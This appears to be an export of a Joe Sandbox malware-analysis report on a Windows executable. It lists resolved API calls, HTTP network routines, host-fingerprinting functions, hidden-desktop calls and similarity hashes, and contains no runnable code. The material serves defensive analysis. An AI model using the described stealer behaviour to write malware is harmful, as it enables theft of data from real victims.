• 5b26e0: GetWindowsDirectoryA; 5b272c GetVolumeInformationA; 5b278c GetProcessHeap RtlAllocateHeap; 5b27c6 wsprintfA.
• 594b80-5953e8 (network routine): 594ae0 ??2@YAPAXI * 3, lstrlen, InternetCrackUrlA; 594cdc InternetOpenA StrCmpCA; 5b3e10 lstrcpy, 5b3e75 GetSystemTime; 595051 InternetConnectA; 595080 HttpOpenRequestA; 5b72b0 lstrcpy and 5b72f0 lstrcpy lstrcat used repeatedly between 5950cb and 5952d1 to build the request; 5952e1 lstrlen lstrlen HttpSendRequestA InternetReadFile; 5953aa InternetReadFile; 5953cc / 5953e1 InternetCloseHandle; 5953e8 InternetCloseHandle CryptStringToBinaryA; 595418 LocalAlloc; 59542f CryptStringToBinaryA; 595447 LocalFree.
• 5a8d2d: 5a8d26 ExitProcess; lstrlen at 5a8d66, 5a8d90, 5a8dba, 5a8ee8; StrCmpCA at 5a8de4, 5a8e04, 5a8e1d, 5a8e3d, 5a8e5d, 5a8e7d, 5a8e9d, 5a8eb6, 5a8ecf; 5a8f1b lstrcpy.
• Unconnected nodes: 5b30d0 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey; 5b8849 free free free __getptd; 5b74ce 5 API calls ctype; 5b9741 128 API calls __setmbcp; 5b3040 GetSystemPowerStatus; 5b2940 GetCurrentProcess IsWow64Process; 5b27f3 lstrcpy; 5b2c70 GetUserDefaultLocaleName LocalAlloc CharToOemW; 599876 143 API calls __setmbcp_nolock; 5b3c60 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy; 5b3360 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA; 5b3190 GetSystemInfo wsprintfA; 5ba2b0 __CxxFrameHandler; 5b2b00 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA; 5b2bb0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA; 5b44a0 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy; 5b84a1 120 API calls 2 library calls; and opaque nodes with only API-call counts: 59d4c9 (140), 5a0549 (126), 5a2749 (298), 5b0946 (1955), 591a64 (162), 59b3f9 (98), 5a6ff9 (138), 59bce9 (90), 5b08e8 (1960), 5ae169 (147), 5a86a6 (47 and 48), 59df00 (497), 5a8ce1 (16), 595799 (57), 5ae219 (140), 5a7743 (1332), 5aac12 (120), 5b0889 (1965), 5a3d09 (244), 5a6709 (675), 5b2d00 (11), 5b0a80 (685), 5915b9 (200), 59a3b9 (165), 5a2839 (290), 5a5036 (295), 5b4e55 (7), 59f9a9 (144), 5b082a (1975), 5b0a21 (692), 5b2820 (10), 5b3420 (6), 5b3220 (7).
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00594BAF
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594C02
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594C35
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594C65
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594CA3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594CD6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00594CE6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 346989addaecf4751c747110f26abe5a4eb1ee8b1d86ccfb1b410b4a45f50fd6
                              • Instruction ID: c9471029cadabd9f2727de7c6af959ac3501f20962dacd337b5891cd16b6cc3a
                              • Opcode Fuzzy Hash: 346989addaecf4751c747110f26abe5a4eb1ee8b1d86ccfb1b410b4a45f50fd6
                              • Instruction Fuzzy Hash: FD522E3191161AABDF11AFA4CC4DEAE7FB9BF84700F154428F905A7251EB34ED468BA0

                              Control-flow Graph (graph legend: Executed / Not Executed; rendered graph data replaced with a summary of its blocks)
                              • 5b63c0-5b63ed: GetPEB
                              • 5b63f3-5b65ee: call 5b6320, GetProcAddress * 20
                              • 5b65f3-5b6653: LoadLibraryA * 5
                              • 5b6655-5b6663: GetProcAddress
                              • 5b6671-5b6697: GetProcAddress * 2
                              • 5b66a5-5b66b3: GetProcAddress
                              • 5b66c1-5b66cf: GetProcAddress
                              • 5b66dd-5b6702: GetProcAddress * 2
                              • 5b6707-5b670a: return
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01602700), ref: 005B6419
                              • GetProcAddress.KERNEL32(74DD0000,016028E0), ref: 005B6432
                              • GetProcAddress.KERNEL32(74DD0000,016028B0), ref: 005B644A
                              • GetProcAddress.KERNEL32(74DD0000,01602940), ref: 005B6462
                              • GetProcAddress.KERNEL32(74DD0000,016095C8), ref: 005B647B
                              • GetProcAddress.KERNEL32(74DD0000,015F53D0), ref: 005B6493
                              • GetProcAddress.KERNEL32(74DD0000,015F52F0), ref: 005B64AB
                              • GetProcAddress.KERNEL32(74DD0000,01602718), ref: 005B64C4
                              • GetProcAddress.KERNEL32(74DD0000,016028F8), ref: 005B64DC
                              • GetProcAddress.KERNEL32(74DD0000,01602850), ref: 005B64F4
                              • GetProcAddress.KERNEL32(74DD0000,01602730), ref: 005B650D
                              • GetProcAddress.KERNEL32(74DD0000,015F5310), ref: 005B6525
                              • GetProcAddress.KERNEL32(74DD0000,01602748), ref: 005B653D
                              • GetProcAddress.KERNEL32(74DD0000,01602868), ref: 005B6556
                              • GetProcAddress.KERNEL32(74DD0000,015F5570), ref: 005B656E
                              • GetProcAddress.KERNEL32(74DD0000,01602880), ref: 005B6586
                              • GetProcAddress.KERNEL32(74DD0000,01602928), ref: 005B659F
                              • GetProcAddress.KERNEL32(74DD0000,015F5470), ref: 005B65B7
                              • GetProcAddress.KERNEL32(74DD0000,016026E8), ref: 005B65CF
                              • GetProcAddress.KERNEL32(74DD0000,015F55D0), ref: 005B65E8
                              • LoadLibraryA.KERNEL32(01602A60,?,?,?,005B1BE3), ref: 005B65F9
                              • LoadLibraryA.KERNEL32(01602A48,?,?,?,005B1BE3), ref: 005B660B
                              • LoadLibraryA.KERNEL32(01602A30,?,?,?,005B1BE3), ref: 005B661D
                              • LoadLibraryA.KERNEL32(01602A78,?,?,?,005B1BE3), ref: 005B662E
                              • LoadLibraryA.KERNEL32(01602AA8,?,?,?,005B1BE3), ref: 005B6640
                              • GetProcAddress.KERNEL32(75A70000,016029E8), ref: 005B665D
                              • GetProcAddress.KERNEL32(75290000,01602A90), ref: 005B6679
                              • GetProcAddress.KERNEL32(75290000,01602A00), ref: 005B6691
                              • GetProcAddress.KERNEL32(75BD0000,01602A18), ref: 005B66AD
                              • GetProcAddress.KERNEL32(75450000,015F54D0), ref: 005B66C9
                              • GetProcAddress.KERNEL32(76E90000,01609598), ref: 005B66E5
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 005B66FC
                              Strings
                              • NtQueryInformationProcess, xrefs: 005B66F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 59e2796342f089df391a30f29f4ec43c2746515fa01d218c485b9701096efa28
                              • Instruction ID: b45e8016249b27d471233435b602f8b28df12388b4bf7d218addee8d49aaf8b5
                              • Opcode Fuzzy Hash: 59e2796342f089df391a30f29f4ec43c2746515fa01d218c485b9701096efa28
                              • Instruction Fuzzy Hash: 2CA13CB5A11206DFD794DF64EC4CE263BB9F788740704C51EEA5683360EB3CA880DB69

                              Control-flow Graph (rendered graph not included in this export)
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00596BAF
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596C02
                              • InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 00596C15
                              • StrCmpCA.SHLWAPI(?,0160EF20), ref: 00596C2D
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00596C55
                              • HttpOpenRequestA.WININET(00000000,GET,?,0160E880,00000000,00000000,-00400100,00000000), ref: 00596C90
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00596CB7
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00596CC6
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00596CE5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00596D3F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00596D9B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00596DBD
                              • InternetCloseHandle.WININET(00000000), ref: 00596DCE
                              • InternetCloseHandle.WININET(?), ref: 00596DD8
                              • InternetCloseHandle.WININET(00000000), ref: 00596DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00596E03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 316608cd32e2bb807f267afefdaaff7dbc32125a1962fb2c23507770ab69fef3
                              • Instruction ID: c193a46b53b40020b59fc171b52ee599873e7579e90f08a1d49a03f08bca4124
                              • Opcode Fuzzy Hash: 316608cd32e2bb807f267afefdaaff7dbc32125a1962fb2c23507770ab69fef3
                              • Instruction Fuzzy Hash: 0B816171A4131AABDF20DFA4DC49FAE7BB8BF44700F144158FA05E7290EB74AD458BA4

                              Control-flow Graph (rendered graph not included in this export)
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005949C3
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00594AD0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 1e9c66860bc7a4c5b9f15bf837e7dcb4190893dfd997f13ee5247f1d022a3483
                              • Instruction ID: ac042f2227306143e75ef2ed6f3c403b76026fe8c4fe2ef53aa13104e8096453
                              • Opcode Fuzzy Hash: 1e9c66860bc7a4c5b9f15bf837e7dcb4190893dfd997f13ee5247f1d022a3483
                              • Instruction Fuzzy Hash: 6931E810B8027D7E96206BF66C66F5FBEF5FF46760B20805FF50856388C9E055018EEA

                              Control-flow Graph (rendered graph not included in this export)
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2A0F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2A16
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 005B2A2A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 6bdb87c60068734ab9d6422db9f88495bbe943aeafe68328daaf8bdc30b0b6b4
                              • Instruction ID: 28991ccc7027a4380c4a811c7dac282e8e3d8df52323f165813c82bfd6dff8ce
                              • Opcode Fuzzy Hash: 6bdb87c60068734ab9d6422db9f88495bbe943aeafe68328daaf8bdc30b0b6b4
                              • Instruction Fuzzy Hash: 6CF0B4B1A40204ABC700DF88DD49F9ABBBCF744B21F00021AFA14E3280D7B8190487A5

                              Control-flow Graph (rendered graph not included in this export)
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,015F5370), ref: 005B6725
                              • GetProcAddress.KERNEL32(74DD0000,015F5390), ref: 005B673D
                              • GetProcAddress.KERNEL32(74DD0000,01609D60), ref: 005B6756
                              • GetProcAddress.KERNEL32(74DD0000,01609E38), ref: 005B676E
                              • GetProcAddress.KERNEL32(74DD0000,01609DC0), ref: 005B6786
                              • GetProcAddress.KERNEL32(74DD0000,01609D90), ref: 005B679F
                              • GetProcAddress.KERNEL32(74DD0000,015FBD90), ref: 005B67B7
                              • GetProcAddress.KERNEL32(74DD0000,0160D630), ref: 005B67CF
                              • GetProcAddress.KERNEL32(74DD0000,0160D618), ref: 005B67E8
                              • GetProcAddress.KERNEL32(74DD0000,0160D5E8), ref: 005B6800
                              • GetProcAddress.KERNEL32(74DD0000,0160D660), ref: 005B6818
                              • GetProcAddress.KERNEL32(74DD0000,015F53B0), ref: 005B6831
                              • GetProcAddress.KERNEL32(74DD0000,015F5450), ref: 005B6849
                              • GetProcAddress.KERNEL32(74DD0000,015F5270), ref: 005B6861
                              • GetProcAddress.KERNEL32(74DD0000,015F54B0), ref: 005B687A
                              • GetProcAddress.KERNEL32(74DD0000,0160D5D0), ref: 005B6892
                              • GetProcAddress.KERNEL32(74DD0000,0160D450), ref: 005B68AA
                              • GetProcAddress.KERNEL32(74DD0000,015FBFE8), ref: 005B68C3
                              • GetProcAddress.KERNEL32(74DD0000,015F54F0), ref: 005B68DB
                              • GetProcAddress.KERNEL32(74DD0000,0160D570), ref: 005B68F3
                              • GetProcAddress.KERNEL32(74DD0000,0160D468), ref: 005B690C
                              • GetProcAddress.KERNEL32(74DD0000,0160D5B8), ref: 005B6924
                              • GetProcAddress.KERNEL32(74DD0000,0160D4E0), ref: 005B693C
                              • GetProcAddress.KERNEL32(74DD0000,015F5530), ref: 005B6955
                              • GetProcAddress.KERNEL32(74DD0000,0160D558), ref: 005B696D
                              • GetProcAddress.KERNEL32(74DD0000,0160D690), ref: 005B6985
                              • GetProcAddress.KERNEL32(74DD0000,0160D588), ref: 005B699E
                              • GetProcAddress.KERNEL32(74DD0000,0160D510), ref: 005B69B6
                              • GetProcAddress.KERNEL32(74DD0000,0160D4F8), ref: 005B69CE
                              • GetProcAddress.KERNEL32(74DD0000,0160D528), ref: 005B69E7
                              • GetProcAddress.KERNEL32(74DD0000,0160D480), ref: 005B69FF
                              • GetProcAddress.KERNEL32(74DD0000,0160D6A8), ref: 005B6A17
                              • GetProcAddress.KERNEL32(74DD0000,0160D498), ref: 005B6A30
                              • GetProcAddress.KERNEL32(74DD0000,0160AC38), ref: 005B6A48
                              • GetProcAddress.KERNEL32(74DD0000,0160D5A0), ref: 005B6A60
                              • GetProcAddress.KERNEL32(74DD0000,0160D678), ref: 005B6A79
                              • GetProcAddress.KERNEL32(74DD0000,015F5550), ref: 005B6A91
                              • GetProcAddress.KERNEL32(74DD0000,0160D6F0), ref: 005B6AA9
                              • GetProcAddress.KERNEL32(74DD0000,015F5590), ref: 005B6AC2
                              • GetProcAddress.KERNEL32(74DD0000,0160D600), ref: 005B6ADA
                              • GetProcAddress.KERNEL32(74DD0000,0160D6C0), ref: 005B6AF2
                              • GetProcAddress.KERNEL32(74DD0000,015F55B0), ref: 005B6B0B
                              • GetProcAddress.KERNEL32(74DD0000,015F58D0), ref: 005B6B23
                              • LoadLibraryA.KERNEL32(0160D540,005B067A), ref: 005B6B35
                              • LoadLibraryA.KERNEL32(0160D648), ref: 005B6B46
                              • LoadLibraryA.KERNEL32(0160D6D8), ref: 005B6B58
                              • LoadLibraryA.KERNEL32(0160D4B0), ref: 005B6B6A
                              • LoadLibraryA.KERNEL32(0160D708), ref: 005B6B7B
                              • LoadLibraryA.KERNEL32(0160D720), ref: 005B6B8D
                              • LoadLibraryA.KERNEL32(0160D438), ref: 005B6B9F
                              • LoadLibraryA.KERNEL32(0160D4C8), ref: 005B6BB0
                              • GetProcAddress.KERNEL32(75290000,015F58F0), ref: 005B6BCC
                              • GetProcAddress.KERNEL32(75290000,0160D8B8), ref: 005B6BE4
                              • GetProcAddress.KERNEL32(75290000,01609548), ref: 005B6BFD
                              • GetProcAddress.KERNEL32(75290000,0160D840), ref: 005B6C15
                              • GetProcAddress.KERNEL32(75290000,015F5950), ref: 005B6C2D
                              • GetProcAddress.KERNEL32(6FD40000,015FBDB8), ref: 005B6C4D
                              • GetProcAddress.KERNEL32(6FD40000,015F5870), ref: 005B6C65
                              • GetProcAddress.KERNEL32(6FD40000,015FBE58), ref: 005B6C7E
                              • GetProcAddress.KERNEL32(6FD40000,0160D7B0), ref: 005B6C96
                              • GetProcAddress.KERNEL32(6FD40000,0160D8D0), ref: 005B6CAE
                              • GetProcAddress.KERNEL32(6FD40000,015F5610), ref: 005B6CC7
                              • GetProcAddress.KERNEL32(6FD40000,015F5970), ref: 005B6CDF
                              • GetProcAddress.KERNEL32(6FD40000,0160D960), ref: 005B6CF7
                              • GetProcAddress.KERNEL32(752C0000,015F5770), ref: 005B6D13
                              • GetProcAddress.KERNEL32(752C0000,015F5630), ref: 005B6D2B
                              • GetProcAddress.KERNEL32(752C0000,0160D900), ref: 005B6D44
                              • GetProcAddress.KERNEL32(752C0000,0160D9D8), ref: 005B6D5C
                              • GetProcAddress.KERNEL32(752C0000,015F5910), ref: 005B6D74
                              • GetProcAddress.KERNEL32(74EC0000,015FBDE0), ref: 005B6D94
                              • GetProcAddress.KERNEL32(74EC0000,015FBEA8), ref: 005B6DAC
                              • GetProcAddress.KERNEL32(74EC0000,0160D9C0), ref: 005B6DC5
                              • GetProcAddress.KERNEL32(74EC0000,015F5990), ref: 005B6DDD
                              • GetProcAddress.KERNEL32(74EC0000,015F59B0), ref: 005B6DF5
                              • GetProcAddress.KERNEL32(74EC0000,015FC010), ref: 005B6E0E
                              • GetProcAddress.KERNEL32(75BD0000,0160D858), ref: 005B6E2E
                              • GetProcAddress.KERNEL32(75BD0000,015F57D0), ref: 005B6E46
                              • GetProcAddress.KERNEL32(75BD0000,01609458), ref: 005B6E5F
                              • GetProcAddress.KERNEL32(75BD0000,0160D930), ref: 005B6E77
                              • GetProcAddress.KERNEL32(75BD0000,0160D978), ref: 005B6E8F
                              • GetProcAddress.KERNEL32(75BD0000,015F5710), ref: 005B6EA8
                              • GetProcAddress.KERNEL32(75BD0000,015F5890), ref: 005B6EC0
                              • GetProcAddress.KERNEL32(75BD0000,0160D7C8), ref: 005B6ED8
                              • GetProcAddress.KERNEL32(75BD0000,0160D768), ref: 005B6EF1
                              • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 005B6F07
                              • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 005B6F1E
                              • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 005B6F35
                              • GetProcAddress.KERNEL32(75A70000,015F5650), ref: 005B6F51
                              • GetProcAddress.KERNEL32(75A70000,0160D918), ref: 005B6F69
                              • GetProcAddress.KERNEL32(75A70000,0160D990), ref: 005B6F82
                              • GetProcAddress.KERNEL32(75A70000,0160D9A8), ref: 005B6F9A
                              • GetProcAddress.KERNEL32(75A70000,0160DA08), ref: 005B6FB2
                              • GetProcAddress.KERNEL32(75450000,015F5670), ref: 005B6FCE
                              • GetProcAddress.KERNEL32(75450000,015F5690), ref: 005B6FE6
                              • GetProcAddress.KERNEL32(75DA0000,015F56B0), ref: 005B7002
                              • GetProcAddress.KERNEL32(75DA0000,0160D7E0), ref: 005B701A
                              • GetProcAddress.KERNEL32(6F070000,015F5730), ref: 005B703A
                              • GetProcAddress.KERNEL32(6F070000,015F5850), ref: 005B7052
                              • GetProcAddress.KERNEL32(6F070000,015F58B0), ref: 005B706B
                              • GetProcAddress.KERNEL32(6F070000,0160D888), ref: 005B7083
                              • GetProcAddress.KERNEL32(6F070000,015F5750), ref: 005B709B
                              • GetProcAddress.KERNEL32(6F070000,015F5930), ref: 005B70B4
                              • GetProcAddress.KERNEL32(6F070000,015F56D0), ref: 005B70CC
                              • GetProcAddress.KERNEL32(6F070000,015F57F0), ref: 005B70E4
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 005B70FB
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 005B7112
                              • GetProcAddress.KERNEL32(75AF0000,0160D948), ref: 005B712E
                              • GetProcAddress.KERNEL32(75AF0000,01609408), ref: 005B7146
                              • GetProcAddress.KERNEL32(75AF0000,0160D9F0), ref: 005B715F
                              • GetProcAddress.KERNEL32(75AF0000,0160DA20), ref: 005B7177
                              • GetProcAddress.KERNEL32(75D90000,015F56F0), ref: 005B7193
                              • GetProcAddress.KERNEL32(6CE50000,0160D738), ref: 005B71AF
                              • GetProcAddress.KERNEL32(6CE50000,015F5790), ref: 005B71C7
                              • GetProcAddress.KERNEL32(6CE50000,0160D828), ref: 005B71E0
                              • GetProcAddress.KERNEL32(6CE50000,0160D870), ref: 005B71F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 4f0fcc70d3d99a687a2c46db3734164a6504fc78161a11f69512551cf64900a6
                              • Instruction ID: ed7ddc1d2671fbbc5a9a4adb202916061ae8218d4d5730da4db8bf015bf22ecd
                              • Opcode Fuzzy Hash: 4f0fcc70d3d99a687a2c46db3734164a6504fc78161a11f69512551cf64900a6
                              • Instruction Fuzzy Hash: C7622DB5610206DFD7D4DF64EC9CE2637B9F788701314C91DEA5683264EB3CA880DB6A
                              APIs
                              • lstrlen.KERNEL32(005BD014), ref: 005AF32E
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF34C
                              • lstrlen.KERNEL32(005BD014), ref: 005AF357
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF371
                              • lstrlen.KERNEL32(005BD014), ref: 005AF37C
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF396
                              • lstrcpy.KERNEL32(00000000,005C5568), ref: 005AF3BE
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF3EC
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF422
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF454
                              • lstrlen.KERNEL32(015F5330), ref: 005AF476
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF506
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AF52B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AF5E2
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 005AF894
                              • lstrlen.KERNEL32(01609568), ref: 005AF8C2
                              • lstrcpy.KERNEL32(00000000,01609568), ref: 005AF8EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AF912
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF966
                              • lstrcpy.KERNEL32(00000000,01609568), ref: 005AFA28
                              • lstrcpy.KERNEL32(00000000,016094B8), ref: 005AFA58
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AFAB7
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 005AFBD5
                              • lstrlen.KERNEL32(01609448), ref: 005AFC03
                              • lstrcpy.KERNEL32(00000000,01609448), ref: 005AFC30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AFC53
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AFCA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 012326ce3e9869d7f6d5978b38db5c04a98e59c2125f2186e8da72ac04f61c73
                              • Instruction ID: 02cb2afb19d10e8b9b4c6eb3963c778f5538e9377c0549f53d66340e7d7e6278
                              • Opcode Fuzzy Hash: 012326ce3e9869d7f6d5978b38db5c04a98e59c2125f2186e8da72ac04f61c73
                              • Instruction Fuzzy Hash: 6DA24830A013069FCB64DF69C949A2ABFE4BF85714F18857DE849CB261EB35DC42CB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
